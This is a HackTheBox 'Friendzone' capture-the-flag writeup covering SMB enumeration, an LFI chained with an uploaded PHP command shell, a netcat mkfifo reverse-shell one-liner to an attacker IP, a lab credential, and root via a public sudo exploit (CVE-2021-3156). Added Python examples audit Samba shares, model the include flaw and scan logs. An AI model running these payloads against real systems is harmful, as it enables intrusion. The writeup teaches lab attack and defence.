
HackTheBox - Friendzone Writeup

tags: writeup HackTheBox Machine Easy OSCP

Port Scanning

# Nmap 7.92 scan initiated Mon Aug  8 06:53:23 2022 as: nmap -sV -T4 -sT -sC -v -oN nmap 10.10.10.123
Nmap scan report for 10.10.10.123
Host is up (0.041s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
|   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.29 (Ubuntu)
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Issuer: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-10-05T21:02:30
| Not valid after:  2018-11-04T21:02:30
| MD5:   c144 1868 5e8b 468d fc7d 888b 1123 781c
|_SHA-1: 88d2 e8ee 1c2c dbd3 ea55 2e5e cdd4 e94c 4c8b 9233
|_http-title: 404 Not Found
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -59m44s, deviation: 1h43m55s, median: 15s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   FRIENDZONE<00>       Flags: <unique><active>
|   FRIENDZONE<03>       Flags: <unique><active>
|   FRIENDZONE<20>       Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2022-08-08T13:54:00+03:00
| smb2-time: 
|   date: 2022-08-08T10:54:00
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug  8 06:53:53 2022 -- 1 IP address (1 host up) scanned in 30.16 seconds

We have the following services:

  • Port 21: FTP server (vsftpd 3.0.3)
  • Port 22: SSH server (OpenSSH 7.6p1)
  • Port 53: DNS server (ISC BIND 9.11.3)
  • Port 80: HTTP web server (Apache 2.4.29)
  • Port 139: NetBIOS session service (Samba)
  • Port 443: HTTPS web server (Apache 2.4.29, certificate issued for friendzone.red)
  • Port 445: SMB (Samba 4.7.6-Ubuntu)

Enumeration

First I look into the Samba shares, and I found some credentials on them. Listing the shares with smbclient and the -L flag we see some directories:

[screenshot missing]

The General share contains some credentials:

[screenshot missing]

And we can upload files to the Development share, so maybe we can upload a reverse shell or a web shell there.

This will be useful to us shortly.
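The share layout found here (a readable share holding credentials next to a guest-writable one) is a textbook Samba misconfiguration, and it is cheap to catch on the defending side before anyone connects. As an added example that is not part of this writeup, here is a small Python auditor that parses an smb.conf and flags every share reachable by unauthenticated guests, worst first. The smb.conf text embedded in it is constructed for the example and is not the box's real configuration; the /etc/Development path is only the location this writeup assumes later.

```python
"""Audit a Samba smb.conf for shares that anonymous (guest) users can read or write.

Added example, not part of the original writeup. SAMPLE_SMB_CONF is constructed
to resemble the share layout found on the box; it is not the real configuration.
"""
import re

SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   map to guest = Bad User

[general]
   path = /etc/general
   browsable = yes
   guest ok = yes
   read only = yes

[Development]
   path = /etc/Development
   browsable = yes
   guest ok = yes
   writable = yes

[homes]
   browsable = no
   read only = no
"""

_SECTION = re.compile(r"^\s*\[(?P<name>[^\]]+)\]\s*$")
_KV = re.compile(r"^\s*(?P<key>[^=;#]+?)\s*=\s*(?P<val>.*?)\s*$")
_YES = {"yes", "true", "1"}


def parse_smb_conf(text):
    """Return {section: {key: value}}; keys are lower-cased with spaces collapsed."""
    sections, current = {}, None
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith((";", "#")):
            continue
        m = _SECTION.match(line)
        if m:
            current = m.group("name").strip()
            sections[current] = {}
            continue
        m = _KV.match(line)
        if m and current is not None:
            key = " ".join(m.group("key").lower().split())
            sections[current][key] = m.group("val")
    return sections


def _truthy(opts, *keys, default=False):
    for k in keys:
        if k in opts:
            return opts[k].strip().lower() in _YES
    return default


def share_exposure(opts):
    """Classify one share: None, 'guest-readable' or 'guest-writable'."""
    guest = _truthy(opts, "guest ok", "public")
    # "writable"/"writeable" are inverted synonyms of "read only" (default: read only = yes)
    if "writable" in opts or "writeable" in opts:
        writable = _truthy(opts, "writable", "writeable")
    else:
        writable = not _truthy(opts, "read only", default=True)
    if not guest:
        return None
    return "guest-writable" if writable else "guest-readable"


def audit_smb_conf(text):
    """Return [(share, exposure, path)] for guest-accessible shares, writable ones first."""
    findings = []
    for name, opts in parse_smb_conf(text).items():
        if name.lower() == "global":
            continue
        exposure = share_exposure(opts)
        if exposure:
            findings.append((name, exposure, opts.get("path", "<no path>")))
    findings.sort(key=lambda f: f[1] != "guest-writable")
    return findings


if __name__ == "__main__":
    for share, exposure, path in audit_smb_conf(SAMPLE_SMB_CONF):
        print(f"{exposure:15} {share:12} {path}")
```

Run it against the real file (`audit_smb_conf(open("/etc/samba/smb.conf").read())`) and any guest-writable hit is a share that doubles as an unauthenticated file drop, which is exactly what the rest of this writeup relies on.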

If we open the web application on port 80 we see this:

[screenshot missing]

Since there is a DNS server, it is worth enumerating its subdomains thoroughly. Normally, as with every HTB machine, we add the machine name with .htb appended to the hosts file (the redirect has to run as root, so use tee instead of a plain sudo echo, whose output redirection would run as the unprivileged user):

echo "10.10.10.123 friendzone.htb" | sudo tee -a /etc/hosts

But the info email address shown on the page gives us the first domain. We add it to the hosts file and then attempt a zone transfer to obtain all the records of that domain with this command:

dig axfr [domain] @[ip]

Assuming there is also a zone named after the site, we query friendzone.red as well.

[screenshot missing]

After this it is time to enumerate those subdomains and start the exploitation.

Exploitation

After enumerating them, the most interesting subdomain was:

administrator1.friendzone.red

It looks like this:

[screenshot missing]

Using the credentials obtained from the Samba share we can log in:

admin:WORKWORKHhallelujah@#

It redirects us to dashboard.php

[screenshot missing]

As we can see in the next image, there are some parameters that we can use to load files in the web app.

[screenshot missing]

If we use the default parameters as the page suggests, we receive this response:

[screenshot missing]

It smells like an LFI, but if we replace the timestamp value with ../../../../../etc/passwd we don't receive any response:

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=../../../../../etc/passwd

[screenshot missing]

It's time to read up on LFI and its tricks. We want to see how the main page is coded, so it is time to use a PHP filter like this one:

php://filter/convert.base64-encode/resource=

This filter base64-encodes the page we load through the LFI, which lets us obtain its source code and check whether there is some filter or similar in place.

In this case I want to see the dashboard code, so with the following URL we can read it:

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard

[screenshot missing]

And if we decode it we can see that a .php extension is appended to every file we try to include.
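Appending .php looks like a safeguard, but it only changes which files can be reached, not whether the request controls the include path. The following Python simulation is an added example, not code from the box or from this writeup: it models the behaviour the decoded dashboard source reveals (parameter plus ".php" goes straight into the include) next to an allow-listed loader. The /var/www/admin document root and the file list are assumptions made for the example; /etc/Development is the location this writeup assumes for the writable share. It shows why the plain /etc/passwd read fails while a php://filter read of a real page and an absolute path to a file the attacker placed on disk both succeed, and why only a fixed allow-list closes the hole.

```python
"""Simulate include($_GET['pagename'] . '.php') next to an allow-listed loader.

Added example, not code from the box: it models the behaviour the writeup
inferred from the decoded dashboard.php (".php" is appended to the request
parameter before it is included). Paths and the file list are constructed.
"""
import os

WEB_ROOT = "/var/www/admin"          # assumed document root for the example
ALLOWED_PAGES = {"timestamp", "dashboard"}

# Constructed view of what exists on disk. /etc/Development/cmd.php stands for a
# file dropped through the guest-writable share described in the writeup.
FILES = {
    "/var/www/admin/dashboard.php",
    "/var/www/admin/timestamp.php",
    "/etc/passwd",
    "/etc/Development/cmd.php",
}


def _exists(path):
    return os.path.normpath(path) in FILES


def vulnerable_resolve(pagename):
    """What the original pattern does: take the parameter, append .php, include it.

    Returns ("include", path), ("filter", path) for a php://filter read, or None
    when PHP would fail to open the file (the writeup's empty response).
    """
    if pagename.startswith("php://filter/"):
        # php://filter wraps another resource; with the suffix appended the
        # resource actually read is "<name>.php", which is why resource=dashboard works.
        resource = pagename.split("resource=", 1)[-1]
        path = os.path.join(WEB_ROOT, resource + ".php")
        return ("filter", os.path.normpath(path)) if _exists(path) else None
    # os.path.join discards WEB_ROOT when the parameter is absolute, exactly as
    # PHP opens an absolute include path directly: that is the /etc/Development case.
    path = os.path.join(WEB_ROOT, pagename + ".php")
    return ("include", os.path.normpath(path)) if _exists(path) else None


def hardened_resolve(pagename):
    """Allow-list the page name and build the path ourselves.

    No characters from the request reach the include path, so stream wrappers,
    traversal sequences and absolute paths all fall through to None.
    """
    if pagename not in ALLOWED_PAGES:
        return None
    return ("include", os.path.join(WEB_ROOT, pagename + ".php"))


if __name__ == "__main__":
    for p in ("timestamp",
              "../../../../../etc/passwd",
              "php://filter/convert.base64-encode/resource=dashboard",
              "/etc/Development/cmd"):
        print(f"{p:55} vulnerable={vulnerable_resolve(p)}  hardened={hardened_resolve(p)}")
```

The traversal attempt fails in both versions, but for different reasons: the vulnerable loader fails only because /etc/passwd.php does not exist, while the hardened loader never builds a path from the request at all. In PHP the equivalent fix is a lookup table of page names, with `allow_url_include` left off and, ideally, `open_basedir` confining the process to the web root.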

[screenshot missing]

Knowing this, maybe we can load a PHP file uploaded through the uploads web page or through the writable Samba share. After looking around in the Samba share we can see where its files are located:

[screenshot missing]

Assuming the shares live under etc/files/, the writable Development folder will be at /etc/Development, so it's time to upload a PHP command shell to the Samba share and try to include it on the web with the following URL:

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/cmd&cmd=id

We can upload to the Samba share by changing to the directory containing the PHP cmd shell and using the put command inside smbclient:

[screenshot missing]

After that we open the URL and can execute commands through it:

view-source:https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/cmd&cmd=cat /etc/passwd

[screenshot missing]

After confirming we have RCE it's time to get a reverse shell. We can use the netcat reverse shell from pentestmonkey, URL-encoded with Burp to avoid problems with special characters. Before requesting the following URL we have to start a listener to catch the reverse shell.

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/cmd&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2%3E%261|nc+10.10.16.5+443+%3E/tmp/f
rlwrap nc -nlvp 443
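Seen from the web server, every step of this chain leaves a distinctive line in the Apache access log: a traversal sequence, a php:// wrapper, an absolute path in a page parameter, and finally a cmd parameter carrying shell syntax. The scanner below is an added example, not part of the original writeup: it parses combined-format log lines, decodes the query string and tags each of those indicators, then lists the source addresses with repeated hits. The log lines are constructed to mirror the requests made against dashboard.php above; they are not real server logs.

```python
"""Flag LFI / command-injection attempts in Apache combined-format access logs.

Added example, not part of the original writeup. SAMPLE_LOG is constructed to
mirror the requests made against dashboard.php in the writeup; it is not a real log.
"""
import re
from urllib.parse import parse_qs, urlsplit

SAMPLE_LOG = """\
10.10.16.5 - - [08/Aug/2022:14:01:02 +0300] "GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.16.5 - - [08/Aug/2022:14:01:40 +0300] "GET /dashboard.php?image_id=a.jpg&pagename=../../../../../etc/passwd HTTP/1.1" 200 380 "-" "Mozilla/5.0"
10.10.16.5 - - [08/Aug/2022:14:02:15 +0300] "GET /dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.10.16.5 - - [08/Aug/2022:14:05:01 +0300] "GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/cmd&cmd=id HTTP/1.1" 200 460 "-" "Mozilla/5.0"
10.10.16.5 - - [08/Aug/2022:14:06:30 +0300] "GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/cmd&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2%3E%261|nc+10.10.16.5+443+%3E/tmp/f HTTP/1.1" 200 380 "-" "Mozilla/5.0"
10.10.14.2 - - [08/Aug/2022:14:07:00 +0300] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
STREAM_WRAPPERS = ("php://", "data:", "phar://", "zip://", "file://")
SHELL_TOKENS = ("/bin/sh", "/bin/bash", "mkfifo", "bash -i", "2>&1", "|nc ", "| nc ")
COMMAND_PARAMS = {"cmd", "exec", "command"}


def classify_target(target):
    """Return the set of indicators found in one request target (path + query)."""
    tags = set()
    query = urlsplit(target).query
    # parse_qs percent-decodes values, so %3b and '+' are already ';' and ' ' here
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name.lower() in COMMAND_PARAMS:
            tags.add("command-param")
        for value in values:
            low = value.lower()
            if "../" in value or "..\\" in value:
                tags.add("traversal")
            if low.startswith(STREAM_WRAPPERS):
                tags.add("stream-wrapper")
            if value.startswith("/") and name.lower() == "pagename":
                tags.add("absolute-include")
            if any(tok in low for tok in SHELL_TOKENS):
                tags.add("shell-payload")
    return tags


def scan_log(lines):
    """Return (ip, status, target, tags) for every request that raised an indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue            # not combined format; skip rather than guess
        tags = classify_target(m.group("target"))
        if tags:
            hits.append((m.group("ip"), int(m.group("status")), m.group("target"), tags))
    return hits


def attackers(lines, threshold=2):
    """Source IPs with at least `threshold` flagged requests."""
    counts = {}
    for ip, _, _, _ in scan_log(lines):
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for ip, status, target, tags in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} {status} {sorted(tags)} {target[:70]}")
    print("sources:", attackers(SAMPLE_LOG.splitlines()))
```

Note that the failed traversal still returns 200 here, exactly as it did on the box (the page renders, just without the included content), so status codes alone would not have surfaced the probing; the query-string indicators do. The "absolute-include" tag is tied to the pagename parameter because that is the one this application passes to include(); adapt the parameter name to the application you are watching.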

After that we have to get user privileges:

User Privesc

Going back one directory and looking inside the mysql_data.conf file we can find some credentials that allow us to log in over SSH as the friend user.

After this it's time to search for a root privesc.


Root Privesc

On this machine there are several ways to obtain root; first we run the linpeas script to enumerate the system.

After running it there are some probable exploits that will work; the first time I rooted the box I used the Sudo Baron Samedit exploit.

This CVE is exploitable by any local user (normal users and system users, sudoers and non-sudoers), without authentication (i.e., the attacker does not need to know the user's password), so we can obtain root privileges easily: we only have to compile it and run it selecting the target version, in this case 1.

Exploit: https://github.com/blasty/CVE-2021-3156
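Whether a host is exposed to Baron Samedit comes down to its sudo version, so the same fact that tells an attacker which target to pick tells an administrator which machines to patch first. The check below is an added example, not from this writeup or from the exploit repository: it reads the version string that `sudo --version` prints and reports whether it falls inside the upstream ranges named in the advisory for CVE-2021-3156 (legacy 1.8.2 through 1.8.31p2 and stable 1.9.0 through 1.9.5p1, fixed in 1.9.5p2). The sample output is constructed. One caveat, repeated in the code: distributions backport the fix without changing the upstream number, so on a packaged system a hit here means "check the package changelog", not "vulnerable".

```python
"""Report whether an upstream sudo version is in the CVE-2021-3156 affected ranges.

Added example, not from the writeup or the exploit repository. Ranges are the
upstream ones from the advisory: legacy 1.8.2 .. 1.8.31p2 and stable 1.9.0 .. 1.9.5p1
(fixed in 1.9.5p2). SAMPLE_OUTPUT is constructed `sudo --version` output.
"""
import re

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")

# (low, high), both inclusive, as (major, minor, patch, p-level)
AFFECTED_RANGES = [
    ((1, 8, 2, 0), (1, 8, 31, 2)),
    ((1, 9, 0, 0), (1, 9, 5, 1)),
]

SAMPLE_OUTPUT = """Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2
"""


def parse_sudo_version(text):
    """Extract (major, minor, patch, p) from a version string or `sudo --version` output.

    The first match wins, which is the "Sudo version ..." line in real output.
    """
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no sudo version found in {text!r}")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def is_baron_samedit_affected(text):
    """True if the upstream version sits inside an affected range.

    Caveat: distributions ship backported fixes under the same upstream number,
    so on packaged systems treat True as "verify against the package changelog",
    not as proof that the binary is exploitable.
    """
    v = parse_sudo_version(text)
    return any(low <= v <= high for low, high in AFFECTED_RANGES)


if __name__ == "__main__":
    v = parse_sudo_version(SAMPLE_OUTPUT)
    print("sudo", ".".join(map(str, v[:3])) + (f"p{v[3]}" if v[3] else ""),
          "affected range:", is_baron_samedit_affected(SAMPLE_OUTPUT))
```

Tuple comparison does the range work: the p-level is a fourth component defaulting to 0, so 1.8.31p2 is still inside the legacy range while 1.8.32 and 1.9.5p2 fall outside it. Feed it `subprocess.run(["sudo", "--version"], capture_output=True, text=True).stdout` to check a live host.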

As you can see on the GitHub page, build it with the commands listed there.

After running make we have to transfer the result to the machine using the Python web server:

python -m http.server 80

Execute this on the machine:

wget -r http://10.10.10.10/CVE-2021-3156

After that, give execute permissions to the files inside the folder and run the exploit with number 1.

Now we have root privileges and we can read the root flag! As I saw in other writeups after finishing the machine, we can also do the privesc with the Python library hijacking technique, since the os library is writable; see this post to learn how to do it and try that technique:

https://rastating.github.io/privilege-escalation-via-python-library-hijacking/


You can find me on:

  • Twitter
  • Github
  • TryHackMe
  • HackTheBox